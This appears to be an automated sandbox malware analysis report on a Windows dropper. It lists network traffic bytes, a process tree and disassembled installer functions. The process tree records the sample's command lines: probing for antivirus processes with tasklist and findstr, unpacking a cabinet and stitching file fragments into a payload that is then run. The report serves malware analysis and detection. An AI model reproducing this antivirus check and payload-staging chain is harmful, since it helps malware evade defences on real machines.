c9 a9 46 db bf c7 2a 19 d1 bf 0f 71 a4 72 4f 8c 88 d2 87 58 a9 e8 aa 06 31 25 39 6f 02 f1 8f 78 58 93 ad 74 d7 f6 1d 5d 72 db a5 32 a7 Data Ascii: ;K<hi"8L;6dYzdCt;6(x}u2y3!KOBk)xU3T%!5iuOSI?Tu4(;4vToJ[^qQ1#Z{#y=D_/ p"m\|?oVSKvFqrOX1%9oxXt]r2
2024-12-27 13:51:45 UTC	15331	OUT	Data Raw: 26 3e 7b e4 f0 3c 40 34 02 3e 2e 8d 6c 88 94 a5 78 a6 a0 ed e2 32 7b 9f 46 93 aa cd 28 1a 6c 9a d3 07 43 c5 3e 0f 9c 84 59 aa 69 f8 09 47 c0 b4 ed 52 83 35 76 5e fe 63 06 2d 49 13 64 c0 85 ad c9 99 07 99 99 41 dc 7b ff 7a 3b 35 5a 44 3a 30 d2 b1 f1 4f 37 4a 7d 5e 1d 55 d8 88 69 78 52 e5 73 42 7e f2 fd 8a df 16 aa 79 2d 53 0c fa eb 4b b5 aa fc 52 f9 5e e1 37 5f aa b1 ff 11 06 de 1c b4 28 2d d1 a1 c0 e1 a7 e3 7d c9 ec f4 28 f3 2e 59 a9 cb dd d5 56 04 bd 26 63 30 4a c4 4c 14 1e 3a 95 67 e8 1e f7 be ee 2c ad a7 d0 f4 63 2d 1c 74 96 b6 55 7c d3 bf bc 1f 8b 59 3c 38 f8 57 85 9f 04 95 34 3c a4 4a b7 8d 89 5d a3 7c 36 5a af 77 30 6c c9 ac 7a 8f ca f4 81 4f e1 10 ea e2 fe 14 3f cb a0 b9 ef 6f 0c c7 7a 1f cf 26 92 1d 78 f2 0b e7 4f bb 78 d5 b8 d7 84 a0 e4 e4 80 5d Data Ascii: &>{<@4>.lx2{F(lC>YiGR5v^c-IdA{z;5ZD:0O7J}^UixRsB~y-SKR^7_(-}(.YV&c0JL:g,c-tU\|Y<8W4<J]\|6Zw0lzO?oz&xOx]
2024-12-27 13:51:48 UTC	1128	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 13:51:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kn3bdv8ipvoauvnqmsg7b24c1b; expires=Tue, 22 Apr 2025 07:38:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JZOZ%2FTegrLEs9gAteJc64jyBIEFE%2Face9BuXqwYakIQVr1yGZQwUrICLJlfO3WBraevFncdVVOCIS8ZCWkU9wgXd0F3qRVZk3K2u9VCvZ0TSvGV1IkbRLknS4ecM0DnRm3k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89c9879e3b0c7e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1653&rtt_var=632&sent=320&recv=574&lost=0&retrans=0&sent_bytes=2832&recv_bytes=553816&delivery_rate=1716637&cwnd=77&unsent_bytes=0&cid=31e168eb2b923d02&ts=2348&x=0"

Target ID:	0
Start time:	08:51:02
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\ZTM2pfyhu3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ZTM2pfyhu3.exe"
Imagebase:	0x20000
File size:	7'085'568 bytes
MD5 hash:	D08440343DCFEBE534564AB0084F5F65
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:51:05
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\PasoCattle.exe"
Imagebase:	0x400000
File size:	1'062'983 bytes
MD5 hash:	A3E9A86D6EDE94C3C71D1F7EEA537766
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:51:06
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Set-up.exe"
Imagebase:	0xe0000
File size:	6'851'208 bytes
MD5 hash:	2A99036C44C996CEDEB2042D389FE23C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 26%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:51:06
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:51:06
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:51:08
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x690000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:51:08
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0xf00000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:51:09
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x690000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:51:09
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0xf00000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:51:11
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 768400
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:51:11
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	extrac32 /Y /E Reflect
Imagebase:	0x9e0000
File size:	29'184 bytes
MD5 hash:	9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:51:12
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "cocks" Articles
Imagebase:	0xf00000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:51:12
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:51:12
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\768400\Climb.com
Wow64 process (32bit):	true
Commandline:	Climb.com V
Imagebase:	0x480000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	08:51:12
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x700000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 05020A08 Relevance: 1.4, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

8wq, xrefs: 05020C4F

Memory Dump Source

Source File: 00000000.00000002.2156736784.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5020000_ZTM2pfyhu3.jbxd

Similarity

API ID:
String ID: 8wq
API String ID: 0-1015343481
Opcode ID: 19b4b1e174834c7ddd5a22f4ea7bd92f8514e74b5a633950dfdb8ff253f743da
Instruction ID: a40ff6d366381818ecf6918a76e536880718da7ed8d76a3b5ba95a4bc42138f0
Opcode Fuzzy Hash: 19b4b1e174834c7ddd5a22f4ea7bd92f8514e74b5a633950dfdb8ff253f743da
Instruction Fuzzy Hash: C371BE307043159FCB54EF78E5A8A2EBBE6FB84304F558469D806DB295DB38EC42CB91

Function 05020590 Relevance: .4, Instructions: 447COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2156736784.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5020000_ZTM2pfyhu3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 297fc773b2421bde3273d31b2280e1f3c4693dd71c24169abeb21efe0355b1dc
Instruction ID: d27c1043458f65a6356aa88ee9b2e9ff03890436005b0eb5609ffd85064a299c
Opcode Fuzzy Hash: 297fc773b2421bde3273d31b2280e1f3c4693dd71c24169abeb21efe0355b1dc
Instruction Fuzzy Hash: BF51417090424ADFCB0ADFB8E99069EBBB2FF89308F50456DC5106B350DB355E46DB91

Function 05020848 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2156736784.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5020000_ZTM2pfyhu3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94e18b6ee340b3f97a93efec6423881444fe9f72d60e9c2ebe0f78b00fee1a1a
Instruction ID: 8f8a897b9ba175671e8cf23f293bc8967b7928c17d139cee450c903a8eb7699c
Opcode Fuzzy Hash: 94e18b6ee340b3f97a93efec6423881444fe9f72d60e9c2ebe0f78b00fee1a1a
Instruction Fuzzy Hash: 8E412D70910209DFCB09DFA8E99069EBBB6FF89308F50456CC9106B354DB356E46CB91

Function 05020C90 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2156736784.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5020000_ZTM2pfyhu3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6905c450dd44fa8b7a4eeb96cccf83c07a14949fa9c4fb811b0ff8fd150487b
Instruction ID: 3cbc278365671cdc6ff0828110f18fdc90fb515bc15fb1f3b4d11cd6fea4c786
Opcode Fuzzy Hash: b6905c450dd44fa8b7a4eeb96cccf83c07a14949fa9c4fb811b0ff8fd150487b
Instruction Fuzzy Hash: 703103757007268FCB01DBA8E5946BFBBE2EF44314F10852AD819DB252DB34EA46CBD1

Analysis Process: PasoCattle.exePID: 5612, Parent PID: 5308COMMON

Execution Graph

Execution Coverage:	17.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21%
Total number of Nodes:	1482
Total number of Limit Nodes:	26

Executed Functions

Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040515B
GetDlgItem.USER32(?,000003EE), ref: 0040516A
GetClientRect.USER32(?,?), ref: 004051C2
GetSystemMetrics.USER32(00000015), ref: 004051CA
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
ShowWindow.USER32(?,00000008), ref: 00405266
GetDlgItem.USER32(?,000003EC), ref: 00405287
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
GetDlgItem.USER32(?,000003F8), ref: 00405179

Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,759223A0,00000000), ref: 00406902

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

GetDlgItem.USER32(?,000003EC), ref: 004052D7
CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
CloseHandle.KERNELBASE(00000000), ref: 004052EC
ShowWindow.USER32(00000000), ref: 00405313
ShowWindow.USER32(?,00000008), ref: 00405318
ShowWindow.USER32(00000008), ref: 0040535F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
CreatePopupMenu.USER32 ref: 004053A2
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
GetWindowRect.USER32(?,?), ref: 004053CA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
OpenClipboard.USER32(00000000), ref: 00405437
EmptyClipboard.USER32 ref: 0040543D
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
GlobalLock.KERNEL32(00000000), ref: 00405453
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
GlobalUnlock.KERNEL32(00000000), ref: 00405489
SetClipboardData.USER32(0000000D,00000000), ref: 00405494
CloseClipboard.USER32 ref: 0040549A

Strings

New install of "%s" to "%s", xrefs: 004051AE
{, xrefs: 0040537E

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: New install of "%s" to "%s"${
API String ID: 2110491804-1641061399
Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038CE
SetErrorMode.KERNELBASE(00008001), ref: 004038D9
OleInitialize.OLE32(00000000), ref: 004038E0

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
CoUninitialize.COMBASE(?), ref: 00403AFD
ExitProcess.KERNEL32 ref: 00403B1D
lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C

Strings

\Temp, xrefs: 00403A47
~nsu.tmp, xrefs: 00403B23
Error launching installer, xrefs: 00403AA9
/D=, xrefs: 004039D2
_?=, xrefs: 00403A90
NCRC, xrefs: 004039A8
SeShutdownPrivilege, xrefs: 00403C42
NSIS Error, xrefs: 0040390E

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2435955865-3712954417
Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
FindClose.KERNEL32(00000000), ref: 00406318

Strings

jF, xrefs: 00406302

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: jF
API String ID: 2295610775-3349280890
Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
GetProcAddress.KERNEL32(00000000), ref: 00406353

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

Call: %d, xrefs: 0040165A
Rename: %s, xrefs: 004018F8
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
Rename on reboot: %s, xrefs: 00401943
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
Jump: %d, xrefs: 00401602
detailprint: %s, xrefs: 00401679
SetFileAttributes: "%s":%08X, xrefs: 0040177B
Sleep(%d), xrefs: 0040169D
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
BringToFront, xrefs: 004016BD
CreateDirectory: "%s" (%d), xrefs: 004017BF
CreateDirectory: "%s" created, xrefs: 00401849
SetFileAttributes failed., xrefs: 004017A1
Aborting: "%s", xrefs: 0040161D
Rename failed: %s, xrefs: 0040194B

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
